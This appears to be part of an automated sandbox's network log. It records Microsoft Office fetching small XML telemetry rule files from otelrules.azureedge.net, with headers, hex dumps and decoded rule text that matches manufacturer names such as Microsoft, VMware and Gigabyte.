                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:03 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:03 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 427
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BA310DA18"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: fcb0891e-801e-007b-6669-28e7ab000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182003Z-15b8d89586flspj6y6m5fk442w0000000fyg0000000041c2
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:03 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      104192.168.2.45126713.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:03 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:03 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 486
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB344914B"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 9b80997a-f01e-0003-4c76-2a4453000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182003Z-159b85dff8fj6b6xhC1DFW8qdg00000001u00000000058a5
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:03 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      105192.168.2.45126913.107.246.454437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:03 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:03 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 486
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B9018290B"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: c8022c20-501e-00a3-08ae-26c0f2000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182003Z-16849878b78qf2gleqhwczd21s00000009yg0000000113en
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:03 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      106192.168.2.45127313.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:04 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:05 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:04 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 494
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB7010D66"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 78a5d0bc-501e-005b-6da6-26d7f7000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182004Z-16849878b787bfsh7zgp804my400000008sg000000003mbb
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:05 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      107192.168.2.45127513.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:04 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:04 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 464
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 6a0b02b6-001e-0046-12c7-2ada4b000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182004Z-159b85dff8fdjprfhC1DFWuqh000000000tg0000000081y0
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:05 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      108192.168.2.45127113.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:04 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:04 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 469
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BBA701121"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 89d7e9f4-d01e-0066-46a8-2aea17000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182004Z-16849878b78qf2gleqhwczd21s0000000a1000000000r8u3
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:05 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      109192.168.2.45127213.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:04 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:05 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:04 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 477
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 9a09e836-e01e-0052-3cae-26d9df000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182004Z-16849878b78p8hrf1se7fucxk80000000apg00000000vbr9
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:05 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      110192.168.2.45127413.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:04 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:05 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:04 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 415
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BA41997E3"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 601805a2-a01e-000d-7265-2ad1ea000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182004Z-17c5cb586f6f8m6jcqp9ufve6n00000000e00000000085bf
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:05 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      111192.168.2.45127713.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:05 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:05 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:05 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 472
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 5fd3a61a-e01e-0071-0feb-2a08e7000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182005Z-16849878b787bfsh7zgp804my400000008ng00000000qkns
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
